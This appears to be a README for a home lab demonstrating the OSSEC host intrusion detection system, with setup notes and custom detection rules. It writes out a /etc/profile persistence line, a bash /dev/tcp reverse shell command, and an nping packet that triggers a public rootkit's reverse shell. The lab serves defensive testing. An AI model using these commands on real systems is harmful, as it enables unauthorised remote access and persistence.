# ossec-demo

This repository contains configuration (that I wrote) for setting up a demo of OSSEC, a host-based IDS (Intrusion Detection System), as well as some code that performs some malicious actions we would like OSSEC to detect.

## setup

The `setup` directory contains a terraform config for spinning up 3 VMs on ESXI:
- `ossec-server`, where the ossec server and web UI will run.
  - 192.168.110.200
- two agents: `ossec-agent-one`, and `ossec-agent-two`, which just run agents, and are where our malicious code will run.
  - 192.168.110.201
  - 192.168.110.202

Once terraform has successfully run and spun up the VMs, I have included Ansible playbooks that coordinate configuring and starting up the OSSEC server, and then generating keys and authenticating the agents to the server.

Once the web UI is set up and running, all three of my machines show up under "available agents":

![Web UI header](images/webui.png)

OSSEC now reports various security events for all three machines:

![Latest events](images/events.png)


## evil

### touching /etc/profile

Adding a callback to `/etc/profile` to run on login is a common persistence method.

After causing my shell to `echo evil` (a benign example) on each login, I can see the modified file in OSSEC's "Integrity checking" section (after the default check interval of 4hr):

```
kyle@ossec-agent-one:~$ echo 'echo evil' | sudo tee -a /etc/profile
[sudo] password for kyle:
echo evil
```

![Integrity checking](images/modified.png)

### starting a reverse shell

I launched a netcat listener on `ossec-agent-one` with `nc -lvnk 5555`.

Then, connected to it from `ossec-agent-two` with `sh -i >& /dev/tcp/192.168.110.201/5555 0>&1`.

A shell was spawned, and I executed `whoami` and `ls -al` over the network.

With the default configuration, no events were generated.

We can tell OSSEC to look for new listening ports to detect this event on the server side of the connection (`ossec-agent-one` in this case). In `ossec.conf`, I tell OSSEC to watch the output of `ss`:

```
<localfile>
  <log_format>full_command</log_format>
  <command>ss -tulpn | grep LISTEN</command>
</localfile>
```

And then I add a rule to `local_rules.xml` to alert when this output changes:

```
<rule id="140123" level="7">
  <if_sid>530</if_sid>
  <match>ossec: output: 'ss -tulpn |grep LISTEN</match>
  <check_diff />
  <description>Listened ports have changed.</description>
</rule>
```

OSSEC detects a new listening netcat process:

![Listening port change detection](images/port-change.png)

On the other side, we want to check for running netcat processes.

A similar rule can be made to detect from the output of `ps`:

Watching for processes whose commandline begins with `nc `:

```
<localfile>
  <log_format>full_command</log_format>
  <command>ps -e -o command | grep "^nc "</command>
</localfile>
```

And the alert:

```
<rule id="140124" level="7">
  <if_sid>530</if_sid>
  <match>ossec: output: 'ps -e -o command | grep "^nc "</match>
  <check_diff />
  <description>Netcat detected.</description>
</rule>
```

OSSEC detects a new netcat process:

![Nc detected in ps output](images/nc-detected.png)

### rootcheck

OSSEC has a module called `rootcheck` that looks for rootkits.

They provide a [list of checks](https://www.ossec.net/docs/manual/rootcheck/manual-rootcheck.html#checks-that-rootcheck-performs) that are performed for detecting rootkits.

I tested out running a [publicly available, student-made rootkit](https://github.com/maK-/maK_it-Linux-Rootkit) on one of the machines with the default rootcheck configuration.

Once running, I triggered the rootkit's reverse shell using a crafted ICMP packet:

```
sudo nping --icmp -c 1 -dest-ip 192.168.110.200 --data-string 'maK_it_$H3LL 192.168.110.201 5555'
```

The reverse shell connects, and I am able to send commands over the network.

With the default configuration, I did not observe any output from OSSEC after triggering this reverse shell.
